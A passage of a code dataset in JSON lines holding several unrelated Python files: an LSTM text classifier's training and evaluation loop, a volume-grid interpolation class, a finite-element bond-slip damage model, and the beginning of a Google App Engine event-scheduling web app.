\"\"\"\r\n Generates a batch iterator for a dataset.\r\n \"\"\"\r\n data = np.array(data)\r\n data_size = len(data)\r\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\r\n for epoch in range(num_epochs):\r\n # Shuffle the data at each epoch\r\n if shuffle:\r\n shuffle_indices = np.random.permutation(np.arange(data_size))\r\n shuffled_data = data[shuffle_indices]\r\n else:\r\n shuffled_data = data\r\n for batch_num in range(num_batches_per_epoch):\r\n start_index = batch_num * batch_size\r\n end_index = min((batch_num + 1) * batch_size, data_size)\r\n yield shuffled_data[start_index:end_index]\r\n\r\n\"\"\"\r\nFuction definition for LSTM Model\r\n\"\"\"\r\ndef train_LSTM_length_256():\r\n del_all_flags(tf.flags.FLAGS)\r\n\r\n flags = tf.app.flags\r\n FLAGS = flags.FLAGS\r\n \r\n # Data loading params\r\n \r\n tf.flags.DEFINE_float(\"dev_sample_percentage\", .3, \"Percentage of the training data to use for validation\")\r\n tf.flags.DEFINE_integer(\"max_sentence_length\", 120, \"Max sentence length in train/test data (Default: 100)\")\r\n \r\n # Model Hyperparameters\r\n tf.flags.DEFINE_string(\"word2vec\", None, \"Word2vec file with pre-trained embeddings\")\r\n tf.flags.DEFINE_integer(\"embedding_dim\", 300, \"Dimensionality of character embedding (Default: 300)\")\r\n tf.flags.DEFINE_integer(\"hidden_size\", 128, \"Dimensionality of character embedding (Default: 128)\")\r\n tf.flags.DEFINE_float(\"dropout_keep_prob\", 0.7, \"Dropout keep probability (Default: 0.5)\")\r\n tf.flags.DEFINE_float(\"l2_reg_lambda\", 3.0, \"L2 regularization lambda (Default: 3.0)\")\r\n \r\n # Training parameters\r\n tf.flags.DEFINE_integer(\"batch_size\", 256, \"Batch Size (Default: 64)\")\r\n tf.flags.DEFINE_integer(\"num_epochs\", 1000, \"Number of training epochs (Default: 100)\")\r\n tf.flags.DEFINE_integer(\"display_every\", 10, \"Number of iterations to display training info.\")\r\n tf.flags.DEFINE_integer(\"evaluate_every\", 500, \"Evaluate model on dev set after this many steps\")\r\n tf.flags.DEFINE_integer(\"checkpoint_every\", 200, \"Save model after this many steps\")\r\n tf.flags.DEFINE_integer(\"num_checkpoints\", 1, \"Number of checkpoints to store\")\r\n tf.flags.DEFINE_float(\"learning_rate\", 1e-3, \"Which learning rate to start with. (Default: 1e-3)\")\r\n \r\n # Misc Parameters\r\n tf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\r\n tf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\r\n \r\n tf.flags.DEFINE_string(\"cell_type\", \"lstm\", \"Type of rnn cell. Choose 'vanilla' or 'lstm' or 'gru' (Default: vanilla)\")\r\n\r\n \r\n with tf.device('/cpu:0'):\r\n train_x = pd.read_csv('train_data.csv',header=0)\r\n y=pd.read_csv('train_labels.csv',header=None)\r\n \r\n test_x=pd.read_csv('test_data.csv',header=0)\r\n test_yy=pd.read_csv('test_labels.csv',header=None)\r\n \r\n \"\"\"\r\n #################################################################\r\n one hot encoding of the label\r\n #################################################################\r\n \"\"\"\r\n x=train_x.values\r\n y=onehot_encoding(y)\r\n y=y.values\r\n \r\n vocab_size=10000\r\n \r\n #test data\r\n test_x=test_x.values\r\n test_yy=onehot_encoding(test_yy)\r\n test_yy=test_yy.values\r\n # Randomly shuffle data\r\n np.random.seed(10)\r\n shuffle_indices = np.random.permutation(np.arange(len(y)))\r\n x_shuffled = x[shuffle_indices]\r\n y_shuffled = y[shuffle_indices]\r\n\r\n # Split train/test set\r\n # TODO: This is very crude, should use cross-validation\r\n x_train= x_shuffled[:]\r\n y_train= y_shuffled[:]\r\n \r\n \r\n test_data_x=test_x[:]\r\n test_data_y=test_yy[:]\r\n \r\n print(\"Training In using LSTM in Progress, wait until the iteration ends, Thanks\") \r\n\r\n with tf.Graph().as_default():\r\n session_conf = tf.ConfigProto(\r\n allow_soft_placement=FLAGS.allow_soft_placement,\r\n log_device_placement=FLAGS.log_device_placement)\r\n sess = tf.Session(config=session_conf)\r\n \r\n \r\n with sess.as_default():\r\n rnn = RNN(\r\n sequence_length=x_train.shape[1],\r\n num_classes=y_train.shape[1],\r\n vocab_size=vocab_size,\r\n embedding_size=FLAGS.embedding_dim,\r\n cell_type=FLAGS.cell_type,\r\n hidden_size=FLAGS.hidden_size,\r\n l2_reg_lambda=FLAGS.l2_reg_lambda\r\n )\r\n\r\n # Define Training procedure\r\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\r\n train_op = tf.train.AdamOptimizer(FLAGS.learning_rate).minimize(rnn.loss, global_step=global_step)\r\n\r\n \r\n # Summaries for loss and accuracy\r\n loss_summary = tf.summary.scalar(\"loss\", rnn.loss)\r\n acc_summary = tf.summary.scalar(\"accuracy\", rnn.accuracy)\r\n \r\n # Train Summaries\r\n train_summary_op = tf.summary.merge([loss_summary, acc_summary])\r\n\r\n # Dev summaries\r\n test_set_summary = tf.summary.merge([loss_summary, acc_summary])\r\n\r\n # Checkpoint directory. Tensorflow assumes this directory already exists so we need to create it\r\n \r\n\r\n\r\n # Initialize all variables\r\n sess.run(tf.global_variables_initializer())\r\n\r\n\r\n\r\n # Generate batches\r\n batches = batch_iter(\r\n list(zip(x_train, y_train)), FLAGS.batch_size, FLAGS.num_epochs)\r\n # Training loop. For each batch...\r\n for batch in batches:\r\n x_batch, y_batch = zip(*batch)\r\n # Train\r\n feed_dict = {\r\n rnn.input_text: x_batch,\r\n rnn.input_y: y_batch,\r\n rnn.dropout_keep_prob: FLAGS.dropout_keep_prob\r\n }\r\n _, step, summaries, loss, accuracy = sess.run(\r\n [train_op, global_step, train_summary_op, rnn.loss, rnn.accuracy], feed_dict)\r\n st=int(step/10)\r\n # Training log display\r\n if step % FLAGS.display_every == 0:\r\n print(\"iteration {}, loss {:g}, acc {:g}\".format(st, loss, accuracy))\r\n\r\n \r\n \"\"\"\"\r\n #########################################################################################################\r\n \r\n Evaluate on a Test Set\r\n \r\n ########################################################################################################\r\n \"\"\"\r\n if step % FLAGS.evaluate_every == 0:\r\n print(\"\\nEvaluation Resul on a test set:\")\r\n feed_dict_dev = {\r\n rnn.input_text: test_data_x,\r\n rnn.input_y: test_data_y,\r\n rnn.dropout_keep_prob: 1.0\r\n }\r\n summaries_dev, loss, accuracy,test_y,test_predicted = sess.run(\r\n [test_set_summary, rnn.loss, rnn.accuracy,rnn.true_values,rnn.predicted_value], feed_dict_dev)\r\n \r\n \r\n\r\n print(\"step {}, loss {:g}, acc {:g}\\n\".format(step, loss, accuracy))\r\n \r\n \r\n \"\"\"\r\n ##########################################################\r\n Plot ROC curve and the end of Training and test phase\r\n #########################################################\r\n \"\"\"\r\n #roc plot\r\n \r\n #get probability score\r\n test_score=np.amax(test_predicted,axis=1)\r\n rocAuc = roc_auc_score(test_y, test_score)\r\n falsePositiveRate, truePositiveRate, _ = roc_curve(test_y, test_score)\r\n\r\n plt.figure()\r\n \r\n plt.plot(falsePositiveRate, truePositiveRate, color='green',\r\n lw=1, label='AUC= %0.2f)' % rocAuc)\r\n plt.plot([0, 1], [0, 1], color='red', lw=3, linestyle='--',label = 'Random')\r\n plt.xlim([-0.05, 1.05])\r\n plt.ylim([-0.05, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('Receiver Operating Characteristic (LSTM,test)')\r\n plt.legend(loc=\"lower right\")\r\n plt.show()\r\n \r\n \r\n \"\"\"\r\n plot precision and recall curve\r\n \"\"\"\r\n #get precision and recall values\r\n precision, recall, thresholds = precision_recall_curve(test_y, test_predicted[:,0], pos_label=0)\r\n # average precision score\r\n # precision auc\r\n pr_auc = auc(recall, precision)\r\n # plot\r\n plt.figure(dpi=50)\r\n plt.plot(recall, precision, lw=1, color='blue', label=f'AUPRC={pr_auc:.3f}')\r\n plt.fill_between(recall, precision, -1, alpha=0.5)\r\n plt.title('Preciion Recall Curve for LSTM')\r\n plt.xlabel('Recall')\r\n plt.ylabel('Precision')\r\n plt.xlim([-0.05, 1.05])\r\n plt.ylim([-0.05, 1.05])\r\n plt.legend()\r\n plt.show()","sub_path":"lstm_model2.py","file_name":"lstm_model2.py","file_ext":"py","file_size_in_byte":10907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"297249887","text":"from __future__ import annotations\nfrom abc import ABC, abstractmethod\nfrom numpy import number\nfrom typing import SupportsRound, Tuple, Callable\nimport math\nimport numpy as np\nimport numpy.typing as npt\n\n\nclass Dataset(ABC):\n @abstractmethod\n def __getitem__(self, key) -> number:\n pass\n\n\nclass UniformGrid(Dataset):\n \"\"\"Abstraction of a uniform grid dataset\n\n The dataset is indexed via nearest neighbors\n \"\"\"\n\n @staticmethod\n def load(filename: str, reader: Callable) -> UniformGrid:\n \"\"\"Static method to read a dataset from a file and construct a UniformGrid dataset\n\n Args:\n filename (str): filename of the dataset\n reader (Callable): a function to read the dataset and return a numpy ndarray with the data\n\n Returns:\n UniformGrid: UniformGrid dataset\n \"\"\"\n return UniformGrid(reader(filename))\n\n def __init__(self, data: npt.NDArray) -> None:\n self.data = data\n self.shape = data.shape\n\n def __getitem__(\n self, key: Tuple[SupportsRound, SupportsRound, SupportsRound]\n ) -> number:\n \"\"\"get element via nearest neighbor\n\n Args:\n key (Tuple[Number, Number, Number]): (x,y,z) tuple\n\n Returns:\n Number: element at specified location\n \"\"\"\n x, y, z = key\n x0 = round(x)\n y0 = round(y)\n z0 = round(z)\n if (\n x0 > self.data.shape[0] - 1\n or x0 < 0\n or y0 > self.data.shape[1] - 1\n or y0 < 0\n or z0 > self.data.shape[2] - 1\n or z0 < 0\n ):\n return np.nan\n return self.data[round(x), round(y), round(z)]\n\n\nclass UniformGridInterpolated(UniformGrid):\n def __init__(self, data: npt.NDArray) -> None:\n UniformGrid.__init__(self, data)\n\n def __getitem__(\n self, key: Tuple[SupportsRound, SupportsRound, SupportsRound]\n ) -> number:\n \"\"\"get element via trilinear interpolation\n\n Args:\n key (Tuple[Number, Number, Number]): (x,y,z) tuple\n\n Returns:\n Number: element at specified location\n \"\"\"\n x, y, z = key\n x0 = math.floor(x)\n y0 = math.floor(y)\n z0 = math.floor(z)\n x1 = x0 + 1 # math.ceil(x + np.spacing(x))\n y1 = y0 + 1 # math.ceil(y + np.spacing(y))\n z1 = z0 + 1 # math.ceil(z + np.spacing(z))\n # verify values are in data range\n if (\n x0 > self.data.shape[0] - 1\n or x0 < 0\n or x1 > self.data.shape[0] - 1\n or x1 < 0\n or y0 > self.data.shape[1] - 1\n or y0 < 0\n or y1 > self.data.shape[1] - 1\n or y1 < 0\n or z0 > self.data.shape[2] - 1\n or z0 < 0\n or z1 > self.data.shape[2] - 1\n or z1 < 0\n ):\n return np.nan\n xd = (x - x0) / (x1 - x0)\n yd = (y - y0) / (y1 - y0)\n zd = (z - z0) / (z1 - z0)\n c000 = self.data[x0, y0, z0]\n c001 = self.data[x0, y0, z1]\n c010 = self.data[x0, y1, z0]\n c011 = self.data[x0, y1, z1]\n c100 = self.data[x1, y0, z0]\n c101 = self.data[x1, y0, z1]\n c110 = self.data[x1, y1, z0]\n c111 = self.data[x1, y1, z1]\n c00 = c000 * (1 - xd) + c100 * xd\n c01 = c001 * (1 - xd) + c101 * xd\n c10 = c010 * (1 - xd) + c110 * xd\n c11 = c011 * (1 - xd) + c111 * xd\n c0 = c00 * (1 - yd) + c10 * yd\n c1 = c01 * (1 - yd) + c11 * yd\n c = c0 * (1 - zd) + c1 * zd\n return c\n\n @staticmethod\n def load(filename: str, reader: Callable) -> UniformGrid:\n \"\"\"Static method to read a dataset from a file and construct a UniformGridInterpolated dataset\n\n Args:\n filename (str): filename of the dataset\n reader (Callable): a function to read the dataset and return a numpy ndarray with the data\n\n Returns:\n UniformGridInterpolated: UniformGridInterpolated dataset\n \"\"\"\n return UniformGridInterpolated(reader(filename))\n\n\nif __name__ == \"__main__\":\n import data_readers.vol as vol_reader\n import matplotlib.pyplot as plt\n\n print(\"testing uniform grid\")\n # dataset = UniformGrid.load(\"data/C60Small.vol\", vol_reader.read)\n dataset = UniformGrid.load(\"data/Skull.vol\", vol_reader.read)\n print(dataset.shape)\n\n plt.figure()\n plt.imshow(dataset.data[30, :, :])\n\n print(\"testing uniform grid trilinear\")\n dataset = UniformGridInterpolated.load(\"data/C60Small.vol\", vol_reader.read)\n data = dataset.data[30, :, :]\n factor = 5\n up_scaled = np.zeros((data.shape[0] * factor, data.shape[1] * factor))\n for r, row in enumerate(np.linspace(0, dataset.shape[0], up_scaled.shape[0])):\n for c, col in enumerate(np.linspace(0, dataset.shape[1], up_scaled.shape[1])):\n try:\n up_scaled[r, c] = dataset[30, row, col]\n except:\n pass\n\n plt.figure()\n\n plt.subplot(1, 2, 1)\n plt.title(\"native\")\n plt.imshow(dataset.data[30, :, :])\n\n plt.subplot(1, 2, 2)\n plt.title(\"5x upscale\")\n plt.imshow(up_scaled)\n\n plt.show()\n","sub_path":"CS6040_DataVisualization/Final/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"23082769","text":"'''\r\nCreated on 09.12.2017\r\n\r\n@author: Yingxiong\r\n'''\r\nfrom traits.api import implements, Int, Array, HasTraits, Instance, \\\r\n Property, cached_property, Constant, Float, List\r\nimport numpy as np\r\nfrom cbfe.fets1d52ulrh import FETS1D52ULRH\r\nfrom ibvpy.api import BCDof\r\nimport matplotlib.pyplot as plt\r\nfrom ibvpy.api import BCDof\r\nfrom mathkit.matrix_la.sys_mtx_assembly import SysMtxAssembly\r\nfrom ibvpy.mesh.fe_grid import FEGrid\r\nfrom scipy.misc import derivative\r\n\r\n\r\nclass MATSEval(HasTraits):\r\n E_m = Float(28484, tooltip='Stiffness of the matrix [MPa]',\r\n auto_set=False, enter_set=False)\r\n\r\n E_f = Float(170000, tooltip='Stiffness of the fiber [MPa]',\r\n auto_set=False, enter_set=False)\r\n\r\n E_b = Float(5,\r\n tooltip='Bond stiffness [N/mm]')\r\n\r\n sigma_y = Float(5,\r\n label=\"sigma_y\",\r\n desc=\"Yield stress\",\r\n enter_set=True,\r\n auto_set=False)\r\n\r\n def gb(self, kappa):\r\n return np.piecewise(kappa, [kappa <= 2, kappa > 2], [lambda x: 1. - (5. + x) / (5. * (x + 1.)), lambda x: 1. - (10. - 1.5 * x) / (5. * (x + 1.))])\r\n\r\n def D(self, kappa):\r\n return np.interp(kappa, [0, 2, 4], [0, 2, -1])\r\n\r\n def get_corr_pred(self, eps, d_eps, sig, t_n, t_n1, alpha, q, kappa):\r\n # g = lambda k: 0.8 - 0.8 * np.exp(-k)\r\n # g = lambda k: 1. / (1 + np.exp(-2 * k + 6.))\r\n n_e, n_ip, n_s = eps.shape\r\n D = np.zeros((n_e, n_ip, 3, 3))\r\n D[:, :, 0, 0] = self.E_m\r\n D[:, :, 2, 2] = self.E_f\r\n E_n = self.E_b * (1 - self.gb(kappa))\r\n sig_trial = E_n * (eps[:, :, 1] + d_eps[:,:, 1])\r\n f_trial = abs(sig_trial) - (self.sigma_y + self.D(kappa))\r\n elas = f_trial <= 1e-8\r\n plas = f_trial > 1e-8\r\n d_sig = np.einsum('...st,...t->...s', D, d_eps)\r\n sig += d_sig\r\n\r\n d_kappa = f_trial / E_n * plas\r\n kappa += d_kappa\r\n E_n1 = self.E_b * (1. - self.gb(kappa))\r\n sig[:, :, 1] = E_n1 * (eps[:,:, 1] + d_eps[:,:, 1])\r\n E_p = E_n1 - derivative(self.gb, kappa, dx=1e-6)*self.E_b*(eps[:, :, 1] + d_eps[:,:, 1])\r\n D[:, :, 1, 1] = E_n1 * elas + E_p * plas\r\n\r\n return sig, D, alpha, q, kappa\r\n\r\n n_s = Constant(3)\r\n\r\n\r\nclass TStepper(HasTraits):\r\n\r\n mats_eval = Instance(MATSEval, arg=(), kw={}) # material model\r\n\r\n fets_eval = Instance(FETS1D52ULRH, arg=(), kw={}) # element formulation\r\n\r\n A = Property()\r\n '''array containing the A_m, L_b, A_f\r\n '''\r\n\r\n def _get_A(self):\r\n return np.array([self.fets_eval.A_m, self.fets_eval.P_b, self.fets_eval.A_f])\r\n\r\n # Number of elements\r\n n_e_x = 30\r\n # length\r\n L_x = Float(600.0)\r\n\r\n domain = Property(Instance(FEGrid), depends_on='L_x')\r\n '''Diescretization object.\r\n '''\r\n @cached_property\r\n def _get_domain(self):\r\n # Element definition\r\n domain = FEGrid(coord_max=(self.L_x,),\r\n shape=(self.n_e_x,),\r\n fets_eval=self.fets_eval)\r\n return domain\r\n\r\n bc_list = List(Instance(BCDof))\r\n\r\n J_mtx = Property(depends_on='L_x')\r\n '''Array of Jacobian matrices.\r\n '''\r\n @cached_property\r\n def _get_J_mtx(self):\r\n fets_eval = self.fets_eval\r\n domain = self.domain\r\n # [ d, n ]\r\n geo_r = fets_eval.geo_r.T\r\n # [ d, n, i ]\r\n dNr_geo = geo_r[:, :, None] * np.array([1, 1]) * 0.5\r\n # [ i, n, d ]\r\n dNr_geo = np.einsum('dni->ind', dNr_geo)\r\n # [ n_e, n_geo_r, n_dim_geo ]\r\n elem_x_map = domain.elem_X_map\r\n # [ n_e, n_ip, n_dim_geo, n_dim_geo ]\r\n J_mtx = np.einsum('ind,enf->eidf', dNr_geo, elem_x_map)\r\n return J_mtx\r\n\r\n J_det = Property(depends_on='L_x')\r\n '''Array of Jacobi determinants.\r\n '''\r\n @cached_property\r\n def _get_J_det(self):\r\n return np.linalg.det(self.J_mtx)\r\n\r\n B = Property(depends_on='L_x')\r\n '''The B matrix\r\n '''\r\n @cached_property\r\n def _get_B(self):\r\n '''Calculate and assemble the system stiffness matrix.\r\n '''\r\n mats_eval = self.mats_eval\r\n fets_eval = self.fets_eval\r\n domain = self.domain\r\n\r\n n_s = mats_eval.n_s\r\n\r\n n_dof_r = fets_eval.n_dof_r\r\n n_nodal_dofs = fets_eval.n_nodal_dofs\r\n\r\n n_ip = fets_eval.n_gp\r\n n_e = domain.n_active_elems\r\n #[ d, i]\r\n r_ip = fets_eval.ip_coords[:, :-2].T\r\n # [ d, n ]\r\n geo_r = fets_eval.geo_r.T\r\n\r\n J_inv = np.linalg.inv(self.J_mtx)\r\n\r\n # shape function for the unknowns\r\n # [ d, n, i]\r\n Nr = 0.5 * (1. + geo_r[:, :, None] * r_ip[None,:])\r\n dNr = 0.5 * geo_r[:, :, None] * np.array([1, 1])\r\n\r\n # [ i, n, d ]\r\n Nr = np.einsum('dni->ind', Nr)\r\n dNr = np.einsum('dni->ind', dNr)\r\n Nx = Nr\r\n # [ n_e, n_ip, n_dof_r, n_dim_dof ]\r\n dNx = np.einsum('eidf,inf->eind', J_inv, dNr)\r\n\r\n B = np.zeros((n_e, n_ip, n_dof_r, n_s, n_nodal_dofs), dtype='f')\r\n B_N_n_rows, B_N_n_cols, N_idx = [1, 1], [0, 1], [0, 0]\r\n B_dN_n_rows, B_dN_n_cols, dN_idx = [0, 2], [0, 1], [0, 0]\r\n B_factors = np.array([-1, 1], dtype='float_')\r\n B[:, :,:, B_N_n_rows, B_N_n_cols] = (B_factors[None, None,:] *\r\n Nx[:, :, N_idx])\r\n B[:, :,:, B_dN_n_rows, B_dN_n_cols] = dNx[:,:,:, dN_idx]\r\n return B\r\n\r\n def apply_essential_bc(self):\r\n '''Insert initial boundary conditions at the start up of the calculation.. \r\n '''\r\n self.K = SysMtxAssembly()\r\n for bc in self.bc_list:\r\n bc.apply_essential(self.K)\r\n\r\n def apply_bc(self, step_flag, K_mtx, F_ext, t_n, t_n1):\r\n '''Apply boundary conditions for the current load increement\r\n '''\r\n for bc in self.bc_list:\r\n bc.apply(step_flag, None, K_mtx, F_ext, t_n, t_n1)\r\n\r\n def get_corr_pred(self, step_flag, U, d_U, eps, sig, t_n, t_n1, alpha, q, kappa):\r\n '''Function calculationg the residuum and tangent operator.\r\n '''\r\n mats_eval = self.mats_eval\r\n fets_eval = self.fets_eval\r\n domain = self.domain\r\n elem_dof_map = domain.elem_dof_map\r\n\r\n n_e = domain.n_active_elems\r\n n_dof_r, n_dim_dof = self.fets_eval.dof_r.shape\r\n n_nodal_dofs = self.fets_eval.n_nodal_dofs\r\n n_el_dofs = n_dof_r * n_nodal_dofs\r\n # [ i ]\r\n w_ip = fets_eval.ip_weights\r\n\r\n d_u_e = d_U[elem_dof_map]\r\n #[n_e, n_dof_r, n_dim_dof]\r\n d_u_n = d_u_e.reshape(n_e, n_dof_r, n_nodal_dofs)\r\n #[n_e, n_ip, n_s]\r\n d_eps = np.einsum('einsd,end->eis', self.B, d_u_n)\r\n\r\n # material response state variables at integration point\r\n sig, D, alpha, q, kappa = mats_eval.get_corr_pred(\r\n eps, d_eps, sig, t_n, t_n1, alpha, q, kappa)\r\n\r\n # update strain ---this should be integrated into the material model\r\n eps += d_eps\r\n\r\n # system matrix\r\n self.K.reset_mtx()\r\n Ke = np.einsum('i,s,einsd,eist,eimtf,ei->endmf',\r\n w_ip, self.A, self.B, D, self.B, self.J_det)\r\n\r\n self.K.add_mtx_array(\r\n Ke.reshape(-1, n_el_dofs, n_el_dofs), elem_dof_map)\r\n\r\n # internal forces\r\n # [n_e, n_n, n_dim_dof]\r\n Fe_int = np.einsum('i,s,eis,einsd,ei->end',\r\n w_ip, self.A, sig, self.B, self.J_det)\r\n F_int = -np.bincount(elem_dof_map.flatten(), weights=Fe_int.flatten())\r\n self.apply_bc(step_flag, self.K, F_int, t_n, t_n1)\r\n return F_int, self.K, eps, sig, alpha, q, kappa\r\n\r\n\r\nclass TLoop(HasTraits):\r\n\r\n ts = Instance(TStepper)\r\n d_t = Float(0.01)\r\n t_max = Float(1.0)\r\n k_max = Int(50)\r\n tolerance = Float(1e-8)\r\n\r\n def eval(self):\r\n\r\n self.ts.apply_essential_bc()\r\n\r\n t_n = 0.\r\n t_n1 = t_n\r\n n_dofs = self.ts.domain.n_dofs\r\n n_e = self.ts.domain.n_active_elems\r\n n_ip = self.ts.fets_eval.n_gp\r\n n_s = self.ts.mats_eval.n_s\r\n U_k = np.zeros(n_dofs)\r\n eps = np.zeros((n_e, n_ip, n_s))\r\n sig = np.zeros((n_e, n_ip, n_s))\r\n alpha = np.zeros((n_e, n_ip))\r\n q = np.zeros((n_e, n_ip))\r\n kappa = np.zeros((n_e, n_ip))\r\n\r\n U_record = np.zeros(n_dofs)\r\n F_record = np.zeros(n_dofs)\r\n sf_record = np.zeros(2 * n_e)\r\n t_record = [t_n]\r\n eps_record = [np.zeros_like(eps)]\r\n sig_record = [np.zeros_like(sig)]\r\n\r\n while t_n1 <= self.t_max - self.d_t:\r\n t_n1 = t_n + self.d_t\r\n k = 0\r\n scale = 1.0\r\n step_flag = 'predictor'\r\n d_U = np.zeros(n_dofs)\r\n d_U_k = np.zeros(n_dofs)\r\n while k <= self.k_max:\r\n if k == self.k_max: # handling non-convergence\r\n print(np.amax(kappa))\r\n print(t_n1)\r\n print('non-convergence')\r\n # scale *= 0.5\r\n # print scale\r\n # t_n1 = t_n + scale * self.d_t\r\n # k = 0\r\n # d_U = np.zeros(n_dofs)\r\n # d_U_k = np.zeros(n_dofs)\r\n # step_flag = 'predictor'\r\n # eps = eps_r\r\n # sig = sig_r\r\n # alpha = alpha_r\r\n # q = q_r\r\n # kappa = kappa_r\r\n\r\n R, K, eps, sig, alpha, q, kappa = self.ts.get_corr_pred(\r\n step_flag, U_k, d_U_k, eps, sig, t_n, t_n1, alpha, q, kappa)\r\n\r\n F_ext = -R\r\n K.apply_constraints(R)\r\n# print 'r', np.linalg.norm(R)\r\n d_U_k = K.solve()\r\n d_U += d_U_k\r\n# print 'r', np.linalg.norm(R)\r\n if np.linalg.norm(R) < self.tolerance:\r\n F_record = np.vstack((F_record, F_ext))\r\n U_k += d_U\r\n U_record = np.vstack((U_record, U_k))\r\n sf_record = np.vstack((sf_record, sig[:, :, 1].flatten()))\r\n eps_record.append(np.copy(eps))\r\n sig_record.append(np.copy(sig))\r\n t_record.append(t_n1)\r\n break\r\n k += 1\r\n step_flag = 'corrector'\r\n\r\n t_n = t_n1\r\n return U_record, F_record, sf_record, np.array(t_record), np.array(eps_record), np.array(sig_record)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n mat = MATSEval()\r\n\r\n fet = FETS1D52ULRH(A_m=120. * 13. - 9. * 1.85,\r\n P_b=10.,\r\n A_f=9. * 1.85)\r\n\r\n ts = TStepper(mats_eval=mat,\r\n fets_eval=fet)\r\n\r\n ts.L_x = 400.\r\n ts.n_e_x = 20\r\n\r\n n_dofs = ts.domain.n_dofs\r\n\r\n d_array = np.array(\r\n [0., 2, 0, 4, 0, 5])\r\n\r\n# d_array = np.array([0., 2, 3, 4, 5])\r\n\r\n dd_arr = np.abs(np.diff(d_array))\r\n x = np.hstack((0, np.cumsum(dd_arr) / sum(dd_arr)))\r\n from scipy.interpolate import interp1d\r\n tf = interp1d(x, d_array)\r\n\r\n ts.bc_list = [BCDof(var='u', dof=n_dofs - 2, value=0.0),\r\n BCDof(var='u', dof=n_dofs - 1, value=1., time_function=tf)]\r\n\r\n tl = TLoop(ts=ts, d_t=0.002)\r\n\r\n U_record, F_record, sf_record, t_record, eps_record, sig_record = tl.eval()\r\n n_dof = 2 * ts.domain.n_active_elems + 1\r\n plt.plot(U_record[:, n_dof], F_record[\r\n :, n_dof] / 1000., label='loaded end')\r\n# plt.plot(U_record[:, 1], F_record[:, n_dof] / 1000., label='free end')\r\n\r\n plt.xlabel('displacement [mm]')\r\n plt.ylabel('pull-out force [KN]')\r\n\r\n plt.legend(loc='best')\r\n\r\n plt.figure()\r\n plt.plot(eps_record[:, -1, -1, 1], sig_record[:, -1, -1, 1])\r\n\r\n plt.show()\r\n\r\n plt.show()\r\n","sub_path":"cbfe/casestudies/matseval_damage.py","file_name":"matseval_damage.py","file_ext":"py","file_size_in_byte":12054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473512091","text":"import webapp2\nimport os\nimport random\n\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.api import users\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\n\nclass Event(db.Model):\n name = db.StringProperty()\n date = db.StringProperty()\n start = db.StringProperty()\n end = db.StringProperty()\n sun = db.StringProperty()\n mon = db.StringProperty()\n tues = db.StringProperty()\n wed = db.StringProperty()\n thurs = db.StringProperty()\n fri = db.StringProperty()\n sat = db.StringProperty()\n attendance = db.StringProperty()\n \nclass EWFHelper(): #Event With Friends Helper class; stores data concerning each friend\n name = ''\n invited = ''\n priority = 0\n availabilities = {}\n def __init__(self, name, invited, priority):\n self.name = name\n self.invited = invited\n self.priority = priority\n \nclass Increment():\n date = ''\n time = ''\n def __init__(self, date, time):\n self.date = date\n self.time = time\n \nclass Option():\n date = ''\n time = ''\n finished = ''\n score = 0\n def __init__(self, date, time, finished, score):\n self.date = date\n self.time = time\n self.finished = finished\n self.score = score\n \n \nclass User(db.Model):\n name = db.StringProperty()\n \nclass Friend(db.Model):\n name = db.StringProperty()\n \nclass Envitation(db.Model):\n sender = db.StringProperty()\n date = db.StringProperty()\n start = db.StringProperty()\n end = db.StringProperty()\n eName = db.StringProperty()\n \nclass Frinvitation(db.Model):\n sender = db.StringProperty()\n \nclass MainPage(webapp2.RequestHandler) :\n #the first thing that happens\n def get(self) :\n user = users.get_current_user()\n if user:\n current = User(key_name=user.nickname())\n current.name = user.nickname()\n current.put()\n nickname = 'Well hello there, ' + user.nickname() + '!'\n template_values = {'message' : nickname, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n self.redirect(users.create_login_url(self.request.uri))\n \nclass CreateEvent(webapp2.RequestHandler) : #runs when you click the 'Create Event' button within the sidebar Create Event button\n def get(self) :\n user = users.get_current_user() #get the current user\n if not user:\n self.redirect(users.create_login_url(self.request.uri))\n name = self.request.get('eventname') #get all the passed-in values\n date = self.request.get('eventdate')\n start = self.request.get('eventstarttime')\n end = self.request.get('eventendtime')\n attendance = self.request.get('likelihood')\n sunday = self.request.get('Sunday')\n monday = self.request.get('Monday')\n tuesday = self.request.get('Tuesday')\n wednesday = self.request.get('Wednesday')\n thursday = self.request.get('Thursday')\n friday = self.request.get('Friday')\n saturday = self.request.get('Saturday')\n if (not name or not date or not start or not end):\n thing = 'Event Incomplete. Event Not Created.'\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\"'\" in name):\n thing = \"Event not created. Event name must not contain an apostrophe\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (\">\" in name):\n thing = \"Event not created. Event name must not contain a greater than symbol\"\n template_values = {'message': thing, 'indexNumber1' : 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n else:\n stupidDate = verifyDateIsNotStupid(date)\n stupidStart = verifyTimeIsNotStupid(start)\n stupidEnd = verifyTimeIsNotStupid(end)\n stupidAttendance = verifyAttendanceIsNotStupid(attendance)\n if (stupidDate == \"stupid\"):\n thing = \"Date format improper. Proper format for dates is: YYYY-MM-DD\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (stupidStart == \"stupid\" or stupidEnd == \"stupid\"):\n thing = \"Time format improper. Proper format for times is: HH:MM\"\n template_values = {'message': thing, 'indexNumber1': 1}\n self.response.out.write(template.render('HTML/newIndex.html', template_values))\n elif (stupidAttendance == \"stupid\"):\n thing = \"Attendance format improper. Attendance must be an integer 0 - 100\"\n template_values = {'message': thing, 'indexNumber1': 